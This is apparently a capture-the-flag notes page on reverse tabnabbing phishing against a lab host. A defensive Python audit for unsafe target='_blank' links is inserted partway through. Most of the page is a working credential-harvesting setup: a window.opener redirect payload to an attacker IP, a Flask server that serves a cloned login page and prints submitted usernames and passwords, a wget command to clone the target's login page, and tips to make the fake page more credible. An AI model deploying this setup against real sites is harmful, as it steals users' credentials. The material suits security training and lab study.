Phishing Attacks

Reverse Tabnabbing

Documentation and original Writeup

If the link uses target="_blank" and doesn’t include rel="noopener" or rel="noreferrer", the new tab gets access to the original page via the window.opener object.

Vulnerable link
<a href="https://attacker-site.com" target="_blank">View article</a>
On the attacker site
window.opener.location = 'https://phishing-site.com/login';
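A defensive check for the condition described above, added here as an example that is not part of the original page: a Python audit that lists links opening a new tab without rel="noopener" or rel="noreferrer". The function name audit_blank_targets and the sample markup are constructed for illustration.

```python
from html.parser import HTMLParser

# rel tokens that stop the new tab from receiving window.opener
SAFE_REL = {"noopener", "noreferrer"}


class BlankTargetAudit(HTMLParser):
    """Record <a>/<area> tags that use target="_blank" without a safe rel token."""

    def __init__(self):
        super().__init__()
        self.findings = []  # (line number, href)

    def handle_starttag(self, tag, attrs):
        if tag not in ("a", "area"):
            return
        first = {}
        for name, value in attrs:  # browsers honour the first duplicate attribute
            first.setdefault(name, value or "")
        if first.get("target", "").strip().lower() != "_blank":
            return
        rel_tokens = set(first.get("rel", "").lower().split())
        if not rel_tokens & SAFE_REL:
            self.findings.append((self.getpos()[0], first.get("href", "")))


def audit_blank_targets(html):
    """Return [(line, href)] for every link that leaves window.opener exposed."""
    parser = BlankTargetAudit()
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample markup; the first line is the vulnerable link shown above.
SAMPLE = """<a href="https://attacker-site.com" target="_blank">View article</a>
<a href="https://example.org/a" target="_blank" rel="noopener">ok</a>
<a href="https://example.org/b" target="_BLANK" rel="nofollow">flagged</a>
<a href="https://example.org/c" target="_blank" rel="NoReferrer external">ok</a>
<a href="/local">no target</a>
"""

if __name__ == "__main__":
    for line, href in audit_blank_targets(SAMPLE):
        print(f"line {line}: {href} opens a new tab without noopener/noreferrer")
```

Current browsers treat target="_blank" as implying noopener unless rel="opener" is set, so flagged links matter most for older clients; an explicit rel value remains the portable fix.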

Craft the phishing attack

Set up a Flask web server:
from flask import Flask, request, render_template

app = Flask(__name__)

# Serves the writeup page that is submitted to the target
@app.route('/writeup.html', methods=['GET'])
def writeup():
    return render_template('writeup.html')

# Serves the cloned login page and prints submitted form fields
@app.route('/accounts/login/', methods=['GET','POST'])
def login():
    if request.method == "POST":
        username = request.form.get('login')
        password = request.form.get('password')
        print("Got username and password: {}:{}".format(username,password))
        return render_template('login.html')
    else:
        return render_template('login.html')

app.run(host="10.10.14.172",port=8000)
Alter the .html file to redirect to your own version of login.html:
<!doctype html>
<html>
Example Writeup
<script>
  if (window.opener)
    window.opener.parent.location.replace('http://10.10.14.172/accounts/login/');
  if (window.parent != window)
    window.parent.location.replace('http://10.10.14.172/accounts/login/');
</script>
</html>
Clone the login page for the platform:
wget http://developer.htb/accounts/login/ -O templates/login.html
  • Change the CSS and JS imports to point to a more credible site.

  • Launch the attack by submitting the .html file.
